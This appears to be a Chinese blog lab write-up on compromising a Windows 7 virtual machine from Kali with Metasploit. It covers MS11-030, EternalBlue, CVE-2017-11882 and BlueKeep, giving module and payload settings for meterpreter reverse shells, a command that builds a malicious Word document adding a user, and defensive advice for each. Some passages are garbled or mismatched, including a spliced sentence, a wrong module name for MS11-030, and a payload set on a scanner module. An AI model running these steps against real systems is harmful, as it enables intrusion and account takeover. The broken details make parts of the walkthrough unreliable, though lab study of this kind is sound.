对win7进行网络渗透

一.准备两台虚拟机,kali和win7,使用neuss和nmap对win7进行扫描

在这里插入图片描述
在这里插入图片描述

二.ms11_030

1.ms原理:在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限,然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询,则该漏洞可能允许远程执行代码。
2.渗透过程
设置参数 (payload,ip等)
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
3.Exploit后出现网站,win7访问
在这里插入图片描述
4.获取shell,ipconfig,发现可以添加用户
在这里插入图片描述
5.防御方案:
*在防火墙禁用TCP端口5355和UDP端口5355
*使用组策略禁用链接-本地多播名称解析
*关闭网络发现

三.MS17-010(Eternal blue永恒之蓝)

1.MS17-010
原理漏洞:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
2.渗透过程
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.33
set payload windows\x64\meterpreter\reverse_tcp
set lhost 192.168.1.12
在这里插入图片描述
3.攻击后,获取shell
在这里插入图片描述
4.预防方案
*关闭445端口
*开启防火墙,或者在高级中修改进出的端口信息
及时更新系统,打漏洞补丁

四.CVE-2017-11882

1.CVE-2017-11882
原理:OFFCIE中有一个文件是负责做公式编辑的文件EQNEDT32.EXE,该模块为公式编辑器,它以OLE技术将公式嵌入在Office文档,当插入和编辑数学公式时,EQNEDT32.EXE并不会被作为Office进程(如Word等)的子进程创建,而是以单独的进程形式存在。这就意味着对于WINWORD.EXE, EXCEL.EXE等Office进程的保护机制,无法阻止EQNEDT32.EXE这个进程被利用。由于该模块对于输入的公式未作正确的处理,攻击者可以通过刻意构造的数据内容覆盖掉栈上的函数地址,从而劫持程序流程,在登录用户的上下文环境中执行任意命令。
2.渗透过程
命令生成文档
python Command43b_CVE-2017-11882.py -c “cmd.exe /c net user xxx 123 /add” -o cve.doc
在这里插入图片描述
3.将ps_shell 移入攻击模块
在这里插入图片描述
4.重启apache服务
在这里插入图片描述
5.将cve.doc移入传win7中
6.设置参数(uripath,payload,lhost)
use exploit/windows/smb/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set URIPATH /
在这里插入图片描述
6.获取shell,可以创建用户(管理员权限)
在这里插入图片描述
7.预防措施
微软11月份的安全补丁已经修复了此漏洞。
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
开启Window Update功能, 定期对系统进行更新维护。
由于涉及模块已经很久未做更新,可能存在大量的安全漏洞,建议取消该模块的注册。
按下Win+R组合键,打开cmd.exe;
reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

五.CVE-2019-0708

1.CVE-2019-0708
原理:漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像永恒之蓝漏洞一样大规模的感染。
渗透流程
2.在win7中开启3389端口‘
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
在这里插入图片描述
3.设置参数
在这里插入图片描述
4.攻击后发现蓝屏
在这里插入图片描述
5.预防方案
*关闭3389端口或添加相应防火墙安全策略限制对3389端口的访问。
*升级操作系统至Windows 8及其以上版本。对于这些版本的Windows系统并不存在CVE-2019-0708漏洞。通过微软官网发布的漏洞补丁进行修复。Windows 7、Windows Server 2008和Windows Server 2008 R2:及时安装官方安全补丁。

  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

老弟和你

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值